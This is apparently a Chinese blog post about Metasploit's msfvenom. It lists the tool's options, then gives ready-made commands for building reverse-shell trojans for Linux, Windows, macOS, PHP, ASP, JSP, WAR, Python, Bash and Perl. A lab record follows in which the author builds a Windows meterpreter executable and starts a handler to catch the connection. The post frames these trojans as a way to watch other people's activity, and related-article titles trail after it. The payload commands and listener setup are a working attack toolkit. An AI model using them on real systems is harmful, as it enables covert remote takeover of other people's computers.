ss

msfvenom

Options:

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-f, --format < format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder(编码器)

-a, --arch < architecture> 指定payload的目标架构

–platform < platform> 指定payload的目标平台

-s, --space < length> 设定有效攻击荷载的最大长度

-b, --bad-chars < list> 设定规避字符集,比如: & #039;\x00\xff& #039;

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

–payload-options 列举payload的标准选项

-o, --out < path> 保存payload

-v, --var-name < name> 指定一个自定义的变量,以确定输出格式

–shellest 最小化生成payload

-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

不同系统下生成木马的命令(在对方的操作系统中生成木马)

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting PayloadsPython
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

实验记录:

本机ip:192.168.0.109

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe
//host是攻击者也就是我的ip地址

msfconle 打开metasploit软件

msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set lhost 192.168.0.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

使用msfvenom生成木马用于监听别人的操作相关推荐

  1. msfvenom生成木马利用

    一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题. 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来 ...

  2. msfvenom生成木马的简单利用

    msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...

  3. android注册广播监听按钮,Android实现广播监听HOME键操作

    先写了个Service,在服务中通过广播来监听HOME键操作: public class HomeService extends Service{ private MonitoHomeReceiver ...

  4. msfvenom生成木马和内网穿透

    msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...

  5. 利用msfvenom生成木马文件反弹shell

    目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...

  6. msfvenom生成木马攻击-Windows10实现自己黑自己

    简介: 昨天看赛题的时候,发现了一个生成"木马",学一下,来做个笔记. 没有想到msf竟然有一个,可以生成木马的工具,msfvenom. 本文用 # 作为注释. 测试环境: 攻击机 ...

  7. aix oracle监听配置_LINUX系统下Oracle修改默认监听端口号操作

    各位头条的朋友们大家好,打算在今后的一段时间为大家分享一批与云计算相关的干货运维技术指南,相信这些操作手册类的文章一定会给大家一些实际的帮助,提升IT技能的@.@大家都知道ORACLE的默认监听端口号 ...

  8. 移动端h5监听浏览器返回操作(目前在react项目中用到)

    前言 1.主要是返回是默认的浏览器返回事件是返回上一个页面. 2.处理页面各种弹窗,点击物理返回应该隐藏这些弹窗而不是直接返回页面. 3.总结下问题,h5应该希望能监听到返回事件并且做一些处理. 相关 ...

  9. Linux下的启动oracle服务 启动监听 开放端口操作

    尝试登录oracle 使用root用户将没有sqlplus命令 [root@localhost ~]# sqlplus /nolog bash: sqlplus: 未找到命令- [root@local ...

最新文章

  1. [转]JQuery ui 实现类似于confirm的功能
  2. 鸟哥的Linux私房菜(基础篇)- 简易且较小安装Red Hat 7.2
  3. 使用 cout 输出数据之控制输出格式(一)
  4. Ajax进入ERROR的部分条件总结
  5. (转)python3 urllib.request.urlopen() 错误UnicodeEncodeError: 'ascii' codec can't encode characters...
  6. android播放视频来源库,一个强悍而优美的Android视频播放器
  7. 读Windows核心编程-1-错误处理
  8. PHP培训领航者兄弟连IT教育推出兄弟会教育模式
  9. VC密码正确无法登陆。证书过期。处理。
  10. HPSocket C++控制台版DEMO
  11. STM32 USB Mass Storage 例程调试笔记
  12. Python学习笔记——入门(IDLE的使用、标准库和模块、测试和调试、虚拟编程环境)
  13. DNS污染是什么意思?DNS污染解决方案
  14. LM08丨网格系列之网格反转(精)
  15. killall杀死nginx顽固进程
  16. 装备仿真模拟推演训练系统软件
  17. AjaxPro Ajax.Net
  18. 陆奇万字长文,讲透企业数字化转型!
  19. Vue--keep-alive--详解
  20. MATLAB VIEW 函数使用

热门文章

  1. what is completion
  2. 【聚宽本地数据JQData】一个命令获取全部股票全部的财务报表数据
  3. 全国邮编前缀归属省及其备注整理,血的代价整理输出,供大家参阅
  4. 剪辑歌曲,哪个音乐剪辑软件操作简单
  5. ATT并非手机品牌 常见国外定制机运营商
  6. NanoPC-T2 Uboot启动过程分析 - 3-2 启动命令的执行
  7. ubuntu关于桌面特效
  8. [ Azure | Az-900 ] 基础知识点总结(一) - Cloud云概念
  9. poj 1384 Piggy-Bank 多重背包问题
  10. 计算机硬盘容量越大运行速度越快,固态硬盘容量越大运行速度越快吗 固态硬盘运行速度分析...